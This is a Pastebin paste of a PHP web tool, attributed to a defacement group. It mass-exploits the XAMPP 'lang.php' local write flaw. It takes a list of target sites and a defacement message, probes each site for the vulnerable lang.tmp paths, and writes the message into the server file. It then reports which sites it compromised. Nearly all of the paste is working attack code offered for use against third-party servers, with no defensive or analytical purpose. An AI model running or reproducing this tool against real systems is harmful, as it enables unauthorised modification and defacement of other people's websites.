SHARE
TWEET

[WEB BASED] Mass Exploiter XAMPP Local Write Access

choirurrizal Dec 15th, 2017 (edited) 634 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <!--
  2.  
  3. coded by ShinChan - N45HT | 15/12/2017
  4. updated at 20/11/2018 22:51 (Asia/Jakarta)
  5.  
  6. # ShinChan - N45HT - N45HT.WEB.ID
  7. # fb.com/angelia.put - fb.com/ShinChan.admin - fb.com/N45HTOfficial - fb.com/groups/N45HTOfficial
  8. # shinchan0x1945@gmail.com
  9.  
  10. note : jangan hapus copyright, hargai pembuat
  11.  
  12. -->
  13. <!doctype html>
  14. <html>
  15.     <head>
  16.         <title>XAMPP Local Write Access Auto Xploiter - Web Based</title>
  17.         <meta name='description' content='XAMPP Local Write Access Auto Exploit!!!' />
  18.         <meta name='author' content='N45HT' />
  19.         <style type='text/css'>
  20.             body {
  21.                 margin:20 auto;
  22.                 background:white;
  23.                 color:black;
  24.                 font-family:verdana;
  25.                 text-align:center;
  26.                 text-shadow: 0 .05rem .1rem rgba(0,0,0,.5);
  27.  
  28.             }
  29.             input[type=submit] {
  30.                 border: 1px solid rgb(100,100,100);
  31.                 color: black;
  32.                 background: transparent;
  33.                 width: 500px;
  34.                 height:35px;
  35.                 font-family:verdana;
  36.                 border-radius:5px;
  37.             }
  38.             input[type=submit]:hover{
  39.                 background-color:gray;
  40.                 color:white;
  41.             }
  42.             input[type=text] {
  43.                 border: 1px solid rgb(100,100,100);
  44.                 color: #000;
  45.                 height:35px;
  46.                 width:500px;
  47.                 font-family:verdana;
  48.                 border-radius:5px;
  49.             }
  50.             textarea {
  51.                 background: transparent;
  52.                 color: #000;
  53.                 border: 1px solid rgb(100,100,100);
  54.                 resize: none;
  55.                 width: 500px;
  56.                 height: 180px;
  57.                 padding-left: 5px;
  58.                 margin: 5px auto;
  59.                 font-family:verdana;
  60.                 border-radius:5px;
  61.             }
  62.             a{
  63.                 text-decoration:none;
  64.             }
  65.         </style>
  66.     </head>
  67.     <body>
  68.         <font size='6'>XAMPP Local Write Access Auto Xploiter</font>
  69.         <br><br>
  70.         <font size='2'>coded by : ShinChan - N45HT</font>
  71.         <br>
  72.         <font size='2'>thanks to : PETR03X - Comod0x - SCYTHE404_LOL - Grav3 - FRU_403</font>
  73.         <br><br><br>
  74.         <form method='POST' action=''>
  75.             Target :<br>
  76.             <textarea name='target' placeholder='target.com or target.com/[path]' required></textarea><br><br>
  77.             kata kata terakhir :<br>
  78.             <input type='text' name='msg' placeholder='hacked by Indonesian h4x0r'/>
  79.             <br><br>
  80.             <input type='submit' value='Exploit!!!' />
  81.         </form>
  82.         <?php
  83.         error_reporting(0);
  84.         if($_POST){
  85.             $target = $_POST['target'];
  86.             $msg = htmlspecialchars(str_replace(" ","_",$_POST['msg']));
  87.             $msg1 = str_replace("<","_",$msg);
  88.             $msg2 = str_replace(">","_",$msg1);
  89.             $msg3 = str_replace("&gt;","_",$msg2);
  90.             $pwn = str_replace("&lt;","_",$msg3);
  91.            
  92.             if($pwn == ""){
  93.                 $pwn = "hacked_by_N45HT";
  94.             }
  95.            
  96.             $targets = explode("\r\n",$target);
  97.             foreach($targets as $site){
  98.                 if(!preg_match("/^http:\/\//",$site) AND !preg_match("/^https:\/\//",$site)){
  99.                     $sites = "http://$site";
  100.                 }else{
  101.                     $sites = $site;
  102.                 }
  103.                 $showsites = htmlspecialchars($sites);
  104.                
  105.                 $chx = curl_init("$sites/xampp/lang.tmp");
  106.                 curl_setopt($chx, CURLOPT_FOLLOWLOCATION, 1);
  107.                 curl_setopt($chx, CURLOPT_RETURNTRANSFER, 1);
  108.                 curl_setopt($chx, CURLOPT_SSL_VERIFYPEER, 0);
  109.                 curl_setopt($chx, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0");
  110.                 curl_exec($chx);
  111.                 $httpcodex = curl_getinfo($chx, CURLINFO_HTTP_CODE);
  112.                 curl_close($chx);
  113.                
  114.                 $chs = curl_init("$sites/security/lang.tmp");
  115.                 curl_setopt($chs, CURLOPT_FOLLOWLOCATION, 1);
  116.                 curl_setopt($chs, CURLOPT_RETURNTRANSFER, 1);
  117.                 curl_setopt($chs, CURLOPT_SSL_VERIFYPEER, 0);
  118.                 curl_setopt($chs, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0");
  119.                 curl_exec($chs);
  120.                 $httpcodes = curl_getinfo($chs, CURLINFO_HTTP_CODE);
  121.                 curl_close($chs);
  122.                
  123.                 if($httpcodex == 200){
  124.                     $ck = curl_init("$sites/xampp/lang.php?$pwn");
  125.                     curl_setopt($ck, CURLOPT_FOLLOWLOCATION, 1);
  126.                     curl_setopt($ck, CURLOPT_RETURNTRANSFER, 1);
  127.                     curl_setopt($ck, CURLOPT_SSL_VERIFYPEER, 0);
  128.                     curl_setopt($ck, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0");
  129.                     $cka = curl_exec($ck);
  130.                     if($cka){
  131.                         $ch = curl_init("$sites/xampp/lang.tmp");
  132.                         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  133.                         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  134.                         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  135.                         curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0");
  136.                         $cek = curl_exec($ch);
  137.                         if(preg_match("/$pwn/",$cek)){
  138.                             echo "<a href='$sites/xampp/lang.tmp' target='_blank'>$showsites/xampp/lang.tmp</a> => OK<br>";
  139.                         }else{
  140.                             echo "$showsites => FAILED<br>";
  141.                         }
  142.                         curl_close($ch);
  143.                     }
  144.                 }else if($httpcodes == 200){
  145.                     $ck = curl_init("$sites/security/lang.php?$pwn");
  146.                     curl_setopt($ck, CURLOPT_FOLLOWLOCATION, 1);
  147.                     curl_setopt($ck, CURLOPT_RETURNTRANSFER, 1);
  148.                     curl_setopt($ck, CURLOPT_SSL_VERIFYPEER, 0);
  149.                     curl_setopt($ck, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0");
  150.                     $cka = curl_exec($ck);
  151.                     if($cka){
  152.                         $ch = curl_init("$sites/security/lang.tmp");
  153.                         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  154.                         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  155.                         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  156.                         curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0");
  157.                         $cek = curl_exec($ch);
  158.                         if(preg_match("/$pwn/",$cek)){
  159.                             echo "<a href='$sites/security/lang.tmp' target='_blank'>$showsites/security/lang.tmp</a> => OK<br>";
  160.                         }else{
  161.                             echo "$showsites => FAILED<br>";
  162.                         }
  163.                         curl_close($ch);
  164.                     }
  165.                 }else{
  166.                     echo "$showsites => Not Vuln<br>";
  167.                 }
  168.             }
  169.         }
  170.         ?>
  171.         <p style='margin-top:50px;'>copyright@<a href='https://facebook.com/N45HTOfficial'>N45HT</a>.</p>
  172.     </body>
  173. </html>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top